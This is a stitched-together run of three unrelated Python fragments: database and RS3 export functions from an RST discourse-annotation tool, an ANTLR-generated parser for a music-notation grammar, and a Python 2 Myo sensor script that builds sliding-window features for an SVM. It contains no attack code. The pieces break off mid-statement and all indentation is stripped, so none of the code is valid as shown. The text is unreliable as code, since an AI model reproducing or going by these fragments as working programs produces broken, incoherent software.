rst_out += '\t\t\t<rel name="' + relname_string + '" type="' + rel[1] + '"/>\n'
rst_out += '''\t\t</relations>
\t</header>
\t<body>
'''
for node in nodes:
if node[5] == "edu":
if len(node[7]) > 0:
relname_string = re.sub(r'_[rm]$','',node[7])
else:
relname_string = ""
if node[3] == "0":
parent_string = ""
relname_string = ""
else:
parent_string = 'parent="'+node[3]+'" '
if len(relname_string) > 0:
relname_string = 'relname="' + relname_string+'"'
contents = node[6]
# Handle XML escapes
contents = re.sub(r'&([^ ;]*) ',r'&\1 ',contents)
contents = re.sub(r'&$','&',contents)
contents = contents.replace(">",">").replace("<","<")
rst_out += '\t\t<segment id="'+node[0]+'" '+ parent_string + relname_string+'>'+contents+'</segment>\n'
for node in nodes:
if node[5] != "edu":
if len(node[7]):
relname_string = re.sub(r'_[rm]$','',node[7])
relname_string = 'relname="'+relname_string+'"'
else:
relname_string = ""
if node[3] == "0":
parent_string = ""
relname_string = ""
else:
parent_string = 'parent="'+node[3]+'"'
if len(relname_string) > 0:
parent_string += ' '
rst_out += '\t\t<group id="'+node[0]+'" type="'+node[5]+'" ' + parent_string + relname_string+'/>\n'
if len(signals) > 0:
rst_out += "\t\t<signals>\n"
for signal in signals:
source, signal_type, signal_subtype, tokens = signal
rst_out += '\t\t\t<signal source="' + source + '" type="' + signal_type + '" subtype="' + signal_subtype + '" tokens="' + tokens + '"/>\n'
rst_out += "\t\t</signals>\n"
rst_out += '''\t</body>
</rst>'''
return rst_out
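# Output sketch (illustrative ids and relation names only): the returned rs3 string
# has roughly this shape:
#   <rst>
#     <header><relations><rel name="elaboration" type="rst"/>...</relations></header>
#     <body>
#       <segment id="1" parent="3" relname="span">Some EDU text</segment>
#       <group id="3" type="span"/>
#       <signals><signal source="1" type="dm" subtype="dm" tokens="4"/></signals>
#     </body>
#   </rst>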
def delete_document(doc,project):
generic_query("DELETE FROM rst_nodes WHERE doc=? and project=?",(doc,project))
generic_query("DELETE FROM rst_relations WHERE doc=? and project=?",(doc,project))
generic_query("DELETE FROM rst_signals WHERE doc=? and project=?",(doc,project))
generic_query("DELETE FROM docs WHERE doc=? and project=?",(doc,project))
def delete_project(project):
generic_query("DELETE FROM rst_nodes WHERE project=?",(project,))
generic_query("DELETE FROM rst_relations WHERE project=?",(project,))
generic_query("DELETE FROM rst_signals WHERE project=?",(project,))
generic_query("DELETE FROM docs WHERE project=?",(project,))
generic_query("DELETE FROM projects WHERE project=?",(project,))
def insert_seg(token_num, doc, project, user):
tok_seg_map = get_tok_map(doc,project,user)
seg_to_split = tok_seg_map[token_num]
push_up(int(seg_to_split),doc,project,user)
parts = get_split_text(token_num,doc,project,user)
update_seg_contents(seg_to_split,parts[0].strip(),doc,project,user)
add_seg(str(int(seg_to_split)+1),parts[1].strip(),doc,project,user)
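# Usage sketch (illustrative values): insert_seg(5, "news1", "proj1", "alice") splits
# the EDU containing token 5 for that user: ids above the split are pushed up by one,
# the original EDU keeps the text up to and including token 5, and a new EDU with the
# next id receives the remaining tokens of that EDU.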
def get_tok_map(doc,project,user):
rows = generic_query("SELECT id, contents FROM rst_nodes WHERE kind='edu' and doc=? and project=? and user=? ORDER BY CAST(id AS int)",(doc,project,user))
all_tokens = {}
token_counter = 0
for row in rows:
edu_text = row[1].strip()
edu_tokens = edu_text.split(" ")
for token in edu_tokens:
token_counter += 1
all_tokens[token_counter] = row[0]
return all_tokens
def push_up(push_above_this_seg,doc,project,user):
ids_above_push = generic_query("SELECT id from rst_nodes WHERE CAST(id as int) > ? and doc=? and project=? and user=? ORDER BY CAST(id as int) DESC",(push_above_this_seg,doc,project,user))
for row in ids_above_push: #Do this row-wise to avoid sqlite unique constraint behavior
id_to_increment = row[0]
generic_query("UPDATE rst_nodes set id = CAST((CAST(id as int) + 1) as text) WHERE id=? and doc=? and project=? and user=?",(id_to_increment,doc,project,user))
generic_query("UPDATE rst_signals set source = CAST((CAST(source as int) + 1) as text) WHERE source=? and doc=? and project=? and user=?",(id_to_increment,doc,project,user))
generic_query("UPDATE rst_nodes set parent = CAST((CAST(parent as int) + 1) as text) WHERE CAST(parent as int)>? and doc=? and project=? and user=?",(push_above_this_seg,doc,project,user))
generic_query("UPDATE rst_nodes set left = left + 1 WHERE left>? and doc=? and project=? and user=?",(push_above_this_seg,doc,project,user))
generic_query("UPDATE rst_nodes set right = right + 1 WHERE right>? and doc=? and project=? and user=?",(push_above_this_seg,doc,project,user))
def push_down(push_above_this_seg,doc,project,user):
ids_above_push = generic_query("SELECT id from rst_nodes WHERE CAST(id as int) > ? and doc=? and project=? and user=? ORDER BY CAST(id as int)",(push_above_this_seg,doc,project,user))
for row in ids_above_push: #Do this row-wise to avoid sqlite unique constraint behavior
id_to_decrement = row[0]
generic_query("UPDATE rst_nodes set id = CAST((CAST(id as int) - 1) as text) WHERE id=? and doc=? and project=? and user=?",(id_to_decrement,doc,project,user))
generic_query("UPDATE rst_signals set source = CAST((CAST(source as int) - 1) as text) WHERE source=? and doc=? and project=? and user=?",(id_to_decrement,doc,project,user))
generic_query("UPDATE rst_nodes set parent = CAST((CAST(parent as int) - 1) as text) WHERE CAST(parent as int)>? and doc=? and project=? and user=?",(push_above_this_seg,doc,project,user))
generic_query("UPDATE rst_nodes set left = left - 1 WHERE left>? and doc=? and project=? and user=?",(push_above_this_seg,doc,project,user))
generic_query("UPDATE rst_nodes set right = right - 1 WHERE right>? and doc=? and project=? and user=?",(push_above_this_seg,doc,project,user))
def get_split_text(tok_num,doc,project,user):
rows = generic_query("SELECT id, contents FROM rst_nodes WHERE kind='edu' and doc=? and project=? and user=? ORDER BY CAST(id AS int)",(doc,project,user))
token_counter = 0
do_return = False
final = []
part1 = ""
part2 = ""
for row in rows:
if do_return:
do_return = False
final = [part1.strip(),part2.strip()]
else:
part1 = ""
part2 = ""
edu_text = row[1].strip()
edu_tokens = edu_text.split(" ")
for token in edu_tokens:
token_counter += 1
if do_return == False:
part1+=token + " "
else:
part2+=token + " "
if tok_num == token_counter:
do_return = True
if do_return:
final = [part1.strip(),part2.strip()]
return final
def update_seg_contents(id,contents,doc,project,user):
generic_query("UPDATE rst_nodes set contents=? WHERE id=? and doc=? and project=? and user=?",(contents,id,doc,project,user))
def get_seg_contents(id,doc,project,user):
return generic_query("SELECT contents from rst_nodes WHERE id=? and doc=? and project=? and user=?",(id,doc,project,user))[0][0]
def add_seg(id,contents,doc,project,user):
generic_query("INSERT INTO rst_nodes VALUES(?,?,?,?,?,?,?,?,?,?,?)", (id,id,id,"0","0","edu",contents,get_def_rel("rst",doc,project),doc,project,user))
def merge_seg_forward(last_tok_num,doc,project,user):
tok_seg_map = get_tok_map(doc,project,user)
seg_to_merge_forward = tok_seg_map[last_tok_num]
part1 = get_seg_contents(str(seg_to_merge_forward),doc,project,user)
part2 = get_seg_contents(str(int(seg_to_merge_forward)+1),doc,project,user)
update_seg_contents(seg_to_merge_forward,part1+" "+part2,doc,project,user)
### TODO: We need to unlink not just the EDU, but also any node whose parent or ancestor is the deleted EDU; those should get parent=0
#delete_node(get_parent(str(int(seg_to_merge_forward)+1),doc,project,user),doc,project,user)
#unlink_children(str(int(seg_to_merge_forward)+1),doc,project,user)
#unlink the edu marked for deletion
update_parent(str(int(seg_to_merge_forward)+1),"0",doc,project,user)
children = get_children(str(int(seg_to_merge_forward)+1),doc,project,user)
#unlink its children
for child in children:
update_parent(child[0],"0",doc,project,user)
#remove it from the database
generic_query("DELETE FROM rst_nodes WHERE id=? and doc=? and project=? and user=?",(str(int(seg_to_merge_forward)+1),doc,project,user))
generic_query("DELETE FROM rst_signals WHERE source=? and doc=? and project=? and user=?",(str(int(seg_to_merge_forward)+1),doc,project,user))
push_down(int(seg_to_merge_forward),doc,project,user)
def copy_doc_to_user(doc, project, user):
doc_to_copy = generic_query("SELECT id, left, right, parent, depth, kind, contents, relname, doc, project FROM rst_nodes WHERE doc=? and project=? and user='_orig'", (doc,project))
copy = []
for row in doc_to_copy:
row += (user,)
copy += (row,)
dbpath = os.path.dirname(os.path.realpath(__file__)) + os.sep +".."+os.sep+"rstweb.db"
conn = sqlite3.connect(dbpath)
cur = conn.cursor()
cur.executemany('INSERT INTO rst_nodes VALUES(?,?,?,?,?,?,?,?,?,?,?)', copy)
cur.execute("INSERT INTO docs VALUES (?,?,?)", (doc,project,user))
conn.commit()
signals_to_copy = generic_query("SELECT source, type, subtype, tokens, doc, project FROM rst_signals WHERE doc=? and | |
if _la==MyGrammerParser.ENDEND:
self.state = 144
self.declare_ending_end()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ExprContext(ParserRuleContext):
__slots__ = 'parser'
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return MyGrammerParser.RULE_expr
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class NoteExpressionContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a MyGrammerParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr_note(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_noteContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNoteExpression" ):
listener.enterNoteExpression(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNoteExpression" ):
listener.exitNoteExpression(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitNoteExpression" ):
return visitor.visitNoteExpression(self)
else:
return visitor.visitChildren(self)
class ChordExpressionContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a MyGrammerParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr_chord(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_chordContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterChordExpression" ):
listener.enterChordExpression(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitChordExpression" ):
listener.exitChordExpression(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitChordExpression" ):
return visitor.visitChordExpression(self)
else:
return visitor.visitChildren(self)
class AccidentalExpressionContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a MyGrammerParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr_acc(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_accContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAccidentalExpression" ):
listener.enterAccidentalExpression(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAccidentalExpression" ):
listener.exitAccidentalExpression(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAccidentalExpression" ):
return visitor.visitAccidentalExpression(self)
else:
return visitor.visitChildren(self)
class VariableExpressionContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a MyGrammerParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr_var(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_varContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterVariableExpression" ):
listener.enterVariableExpression(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitVariableExpression" ):
listener.exitVariableExpression(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitVariableExpression" ):
return visitor.visitVariableExpression(self)
else:
return visitor.visitChildren(self)
class RestExpressionContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a MyGrammerParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr_rest(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_restContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRestExpression" ):
listener.enterRestExpression(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRestExpression" ):
listener.exitRestExpression(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRestExpression" ):
return visitor.visitRestExpression(self)
else:
return visitor.visitChildren(self)
def expr(self):
localctx = MyGrammerParser.ExprContext(self, self._ctx, self.state)
self.enterRule(localctx, 26, self.RULE_expr)
try:
self.state = 152
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,12,self._ctx)
if la_ == 1:
localctx = MyGrammerParser.NoteExpressionContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 147
self.expr_note()
pass
elif la_ == 2:
localctx = MyGrammerParser.ChordExpressionContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 148
self.expr_chord()
pass
elif la_ == 3:
localctx = MyGrammerParser.VariableExpressionContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 149
self.expr_var()
pass
elif la_ == 4:
localctx = MyGrammerParser.AccidentalExpressionContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 150
self.expr_acc()
pass
elif la_ == 5:
localctx = MyGrammerParser.RestExpressionContext(self, localctx)
self.enterOuterAlt(localctx, 5)
self.state = 151
self.expr_rest()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Expr_noteContext(ParserRuleContext):
__slots__ = 'parser'
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def note_value(self):
return self.getTypedRuleContext(MyGrammerParser.Note_valueContext,0)
def OPEN_PAR(self):
return self.getToken(MyGrammerParser.OPEN_PAR, 0)
def PITCH(self):
return self.getToken(MyGrammerParser.PITCH, 0)
def COMMA_SEP(self):
return self.getToken(MyGrammerParser.COMMA_SEP, 0)
def INTEGER(self):
return self.getToken(MyGrammerParser.INTEGER, 0)
def CLOSE_PAR(self):
return self.getToken(MyGrammerParser.CLOSE_PAR, 0)
def ACCIDENTAL(self):
return self.getToken(MyGrammerParser.ACCIDENTAL, 0)
def DOTTED(self):
return self.getToken(MyGrammerParser.DOTTED, 0)
def getRuleIndex(self):
return MyGrammerParser.RULE_expr_note
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpr_note" ):
listener.enterExpr_note(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpr_note" ):
listener.exitExpr_note(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitExpr_note" ):
return visitor.visitExpr_note(self)
else:
return visitor.visitChildren(self)
def expr_note(self):
localctx = MyGrammerParser.Expr_noteContext(self, self._ctx, self.state)
self.enterRule(localctx, 28, self.RULE_expr_note)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 154
self.note_value()
self.state = 155
self.match(MyGrammerParser.OPEN_PAR)
self.state = 157
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==MyGrammerParser.ACCIDENTAL:
self.state = 156
self.match(MyGrammerParser.ACCIDENTAL)
self.state = 159
self.match(MyGrammerParser.PITCH)
self.state = 160
self.match(MyGrammerParser.COMMA_SEP)
self.state = 161
self.match(MyGrammerParser.INTEGER)
self.state = 162
self.match(MyGrammerParser.CLOSE_PAR)
self.state = 164
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==MyGrammerParser.DOTTED:
self.state = 163
self.match(MyGrammerParser.DOTTED)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
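# Reconstructed rule (inferred from the generated parsing code above, not copied from
# the grammar file): expr_note appears to implement something like
#   expr_note : note_value OPEN_PAR ACCIDENTAL? PITCH COMMA_SEP INTEGER CLOSE_PAR DOTTED? ;
# i.e. a note literal such as "quarter(#D,5)", where the concrete token spellings are
# assumptions.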
class Expr_chordContext(ParserRuleContext):
__slots__ = 'parser'
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def CHORD(self):
return self.getToken(MyGrammerParser.CHORD, 0)
def OPEN_PAR(self, i:int=None):
if i is None:
return self.getTokens(MyGrammerParser.OPEN_PAR)
else:
return self.getToken(MyGrammerParser.OPEN_PAR, i)
def expr_note(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_noteContext,0)
def expr_add_note(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_add_noteContext,0)
def CLOSE_PAR(self, i:int=None):
if i is None:
return self.getTokens(MyGrammerParser.CLOSE_PAR)
else:
return self.getToken(MyGrammerParser.CLOSE_PAR, i)
def note_value(self):
return self.getTypedRuleContext(MyGrammerParser.Note_valueContext,0)
def FIXED_CHORD(self):
return self.getToken(MyGrammerParser.FIXED_CHORD, 0)
def COMMA_SEP(self):
return self.getToken(MyGrammerParser.COMMA_SEP, 0)
def INTEGER(self):
return self.getToken(MyGrammerParser.INTEGER, 0)
def DOTTED(self):
return self.getToken(MyGrammerParser.DOTTED, 0)
def getRuleIndex(self):
return MyGrammerParser.RULE_expr_chord
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpr_chord" ):
listener.enterExpr_chord(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpr_chord" ):
listener.exitExpr_chord(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitExpr_chord" ):
return visitor.visitExpr_chord(self)
else:
return visitor.visitChildren(self)
def expr_chord(self):
localctx = MyGrammerParser.Expr_chordContext(self, self._ctx, self.state)
self.enterRule(localctx, 30, self.RULE_expr_chord)
self._la = 0 # Token type
try:
self.state = 185
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,16,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 166
self.match(MyGrammerParser.CHORD)
self.state = 167
self.match(MyGrammerParser.OPEN_PAR)
self.state = 168
self.expr_note()
self.state = 169
self.expr_add_note()
self.state = 170
self.match(MyGrammerParser.CLOSE_PAR)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 172
self.match(MyGrammerParser.CHORD)
self.state = 173
self.match(MyGrammerParser.OPEN_PAR)
self.state = 174
self.note_value()
self.state = 175
self.match(MyGrammerParser.OPEN_PAR)
self.state = 176
self.match(MyGrammerParser.FIXED_CHORD)
self.state = 177
self.match(MyGrammerParser.CLOSE_PAR)
self.state = 179
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==MyGrammerParser.DOTTED:
self.state = 178
self.match(MyGrammerParser.DOTTED)
self.state = 181
self.match(MyGrammerParser.COMMA_SEP)
self.state = 182
self.match(MyGrammerParser.INTEGER)
self.state = 183
self.match(MyGrammerParser.CLOSE_PAR)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Expr_add_noteContext(ParserRuleContext):
__slots__ = 'parser'
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def COMMA_SEP(self):
return self.getToken(MyGrammerParser.COMMA_SEP, 0)
def expr_note(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_noteContext,0)
def expr_add_note(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_add_noteContext,0)
def getRuleIndex(self):
return MyGrammerParser.RULE_expr_add_note
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpr_add_note" ):
listener.enterExpr_add_note(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpr_add_note" ):
listener.exitExpr_add_note(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitExpr_add_note" ):
return visitor.visitExpr_add_note(self)
else:
return visitor.visitChildren(self)
def expr_add_note(self):
localctx = MyGrammerParser.Expr_add_noteContext(self, self._ctx, self.state)
self.enterRule(localctx, 32, self.RULE_expr_add_note)
try:
self.state = 193
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,17,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 187
self.match(MyGrammerParser.COMMA_SEP)
self.state = 188
self.expr_note()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 189
self.match(MyGrammerParser.COMMA_SEP)
self.state = 190
self.expr_note()
self.state = 191
self.expr_add_note()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Expr_varContext(ParserRuleContext):
__slots__ = 'parser'
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def IDENTIFIER(self):
return self.getToken(MyGrammerParser.IDENTIFIER, 0)
def getRuleIndex(self):
return MyGrammerParser.RULE_expr_var
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpr_var" ):
listener.enterExpr_var(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpr_var" ):
listener.exitExpr_var(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitExpr_var" ):
return visitor.visitExpr_var(self)
else:
return visitor.visitChildren(self)
def expr_var(self):
localctx = MyGrammerParser.Expr_varContext(self, self._ctx, self.state)
self.enterRule(localctx, 34, self.RULE_expr_var)
try:
self.enterOuterAlt(localctx, 1)
self.state = 195
self.match(MyGrammerParser.IDENTIFIER)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Expr_accContext(ParserRuleContext):
__slots__ = 'parser'
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ACCIDENTAL_KEY(self):
return self.getToken(MyGrammerParser.ACCIDENTAL_KEY, 0)
def OPEN_PAR(self):
return self.getToken(MyGrammerParser.OPEN_PAR, 0)
def expr_add_acc(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_add_accContext,0)
def CLOSE_PAR(self):
return self.getToken(MyGrammerParser.CLOSE_PAR, 0)
def getRuleIndex(self):
return MyGrammerParser.RULE_expr_acc
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpr_acc" ):
listener.enterExpr_acc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpr_acc" ):
listener.exitExpr_acc(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitExpr_acc" ):
return visitor.visitExpr_acc(self)
else:
return visitor.visitChildren(self)
def expr_acc(self):
localctx = MyGrammerParser.Expr_accContext(self, self._ctx, self.state)
self.enterRule(localctx, 36, self.RULE_expr_acc)
try:
self.enterOuterAlt(localctx, 1)
self.state = 197
self.match(MyGrammerParser.ACCIDENTAL_KEY)
self.state = 198
self.match(MyGrammerParser.OPEN_PAR)
self.state = 199
self.expr_add_acc()
self.state = 200
self.match(MyGrammerParser.CLOSE_PAR)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Expr_add_accContext(ParserRuleContext):
__slots__ = 'parser'
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ACCIDENTAL(self):
return self.getToken(MyGrammerParser.ACCIDENTAL, 0)
def PITCH(self):
return self.getToken(MyGrammerParser.PITCH, 0)
def COMMA_SEP(self):
return self.getToken(MyGrammerParser.COMMA_SEP, 0)
def expr_add_acc(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_add_accContext,0)
def getRuleIndex(self):
return MyGrammerParser.RULE_expr_add_acc
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpr_add_acc" ):
listener.enterExpr_add_acc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpr_add_acc" ):
listener.exitExpr_add_acc(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitExpr_add_acc" ):
return visitor.visitExpr_add_acc(self)
else:
return visitor.visitChildren(self)
def expr_add_acc(self):
localctx = MyGrammerParser.Expr_add_accContext(self, self._ctx, self.state)
self.enterRule(localctx, 38, self.RULE_expr_add_acc)
try:
self.state = 212
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,18,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 202
self.match(MyGrammerParser.ACCIDENTAL)
self.state = 203
self.match(MyGrammerParser.PITCH)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 204
self.match(MyGrammerParser.ACCIDENTAL)
self.state = 205
self.match(MyGrammerParser.PITCH)
self.state = 206
self.match(MyGrammerParser.COMMA_SEP)
self.state = 207
self.expr_add_acc()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 208
self.match(MyGrammerParser.PITCH)
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 209
self.match(MyGrammerParser.PITCH)
self.state = 210
self.match(MyGrammerParser.COMMA_SEP)
self.state = 211
self.expr_add_acc()
| |
#!/usr/bin/python
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import time
import sys
import threading
import random
import Queue
from sklearn import preprocessing, svm, tree
from sklearn.ensemble import RandomForestClassifier
from sklearn.decomposition import PCA
import math
import pickle
import os
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def generate_stream(logfile, df):
"""
generate_stream generates a stream from a log file in a real-time manner
Parameters:
logfile: the input file that is converted to a DataFrame (df) and used as a real-time stream;
the logfile can be an offline file or a file that is constantly being written by
another program (e.g. hello-myo)
df: the DataFrame that holds all the updates from logfile; df will be shared with other
thread(s)
"""
print 'start stream+++++++++++'
i = 0
while 1:
where = logfile.tell()
line = logfile.readline()
if not line:
print 'not line, stream waiting'
time.sleep(0.5)
logfile.seek(where)
i += 1
else:
ll = line.strip(' \r\n').split(',')
df.loc[ll[0]] = ll[1:11]
i = 0
#print df.ix[-1]
if i == 20:
break
def normalization(arr):
"""
normalization: scale an array or DataFrame column-wise to zero mean and a range within [-1, 1]
Parameters:
arr: numpy array or pandas DataFrame
Return:
scaled array values
"""
return (arr - arr.mean(0)) / (arr.max(0) - arr.min(0))
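# Worked example (illustrative numbers): for a column with values [0, 5, 10],
# mean = 5 and max - min = 10, so normalization() maps it to [-0.5, 0.0, 0.5],
# i.e. zero mean with a per-column range of at most 1.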
def count_mean_crossing(df):
"""
count_mean_crossing: count the number of mean crossings on each dimension of an ndarray or DataFrame
Parameters:
df: DataFrame
Return:
array type, number of mean crossings on each dimension
"""
tmp_df = df - df.mean(0)
d = df.shape[1]
res = np.zeros(d)
for i in xrange(d) :
col = tmp_df.ix[:, i].values  # use the mean-subtracted column so sign changes are mean crossings
res[i] = np.count_nonzero(np.diff(np.sign(col)))
return res
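# Worked example (illustrative numbers): for a column [1, 3, 1, 3] the mean is 2, so
# the mean-subtracted values [-1, 1, -1, 1] change sign 3 times; count_mean_crossing
# is intended to report 3 mean crossings for that dimension.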
def calculate_stat(df):
"""
calculate_stat: calculate different statistics of the given DataFrame; this function is used to generate
features (a list of features forming one sample point) for the support vector machine
Parameter:
df: DataFrame type, usually a sliding window in this function
Return:
right now, for each 9-dimensional input sliding window, calculate_stat computes 9*4 = 36 features,
i.e. [mean, median, var, number_of_mean_crossing] for each dimension [accel_xyz, gyro_xyz, roll, pitch, yaw]
"""
#df = normalization(df)
mean = df.mean(0).values
median = df.median(0).values
var = df.var(0).values
mean_crossing_count = count_mean_crossing(df)
#print 'mean_crossing_count: ', mean_crossing_count
res = np.concatenate((mean, median, var, mean_crossing_count))
#print 'feature size', res.shape, 'feature: \n', res
return res
def get_sliding_window(df, ws, get_traning_data = False, label = -1, \
n_sample = 45, pattern_name = 'NA', output_format = 'hdf', \
save_data = 'train', aws = 120, ss = None, fs = 20):
"""
get_sliding_window: 1. generates sliding windows from the data stream in a real-time manner
2. generates training feature samples for the SVM (when get_traning_data is True) or tests the
real-time stream by recognizing the current unit patterns
3. stores the generated feature samples (in HDF5 when output_format = 'hdf', in a csv file when output_format = 'csv')
Parameters:
df is the data stream
ws is the window size, given as a time duration, e.g. 2 seconds
if get_traning_data is set True, training phase: get_sliding_window() generates sliding windows from the data stream, calculates statistics (features) for each sliding window,
uses those samples as training samples to train a PCA model and an SVM model, and stores the training feature samples in either 'hdf5' or 'csv'
if get_traning_data is set False, testing phase: get_sliding_window() generates sliding windows from the data stream, calculates statistics (features) for each sliding window,
and applies those samples as testing samples to the PCA and SVM models generated above to predict unit_patterns in a real-time manner;
right now we apply every accumulated 15 testing samples to PCA and SVM because the generated statistics (features) need to be scaled together
label: the label corresponding to the unit_patterns (for training purposes), effective only in the training phase
n_sample: number of training samples to generate, effective only in the training phase, defaults to 45
output_format: right now supports saving as 'hdf5' or 'csv'
save_data:
'train' save collected training samples, effective only in the training phase, right now only supports 'hdf5'
'train_append' append training samples if the corresponding DataFrame already exists,
effective only in the training phase, right now only supports 'hdf5'
'test' save collected testing samples, effective only in the testing phase, right now only supports 'hdf5'
'test_simple' save collected testing samples with only the time index plus label and label_index,
effective only in the testing phase, right now only supports 'hdf5'
aws: activity window size, default 120, i.e. the system predicts the current activity every 120 sliding windows
ss is the step size, given as a time duration, e.g. when ws = 4 seconds and ss = 1 second, consecutive sliding windows overlap by 75 percent
fs is the sampling frequency, right now 20 samples/second as generated by hello-myo.cpp
"""
print '+++++++++++++++++++start sliding windows+++++++++++++++++'
if ss is None:
# ss was not provided; default the step size to 25% of the window size (75% overlap between consecutive windows).
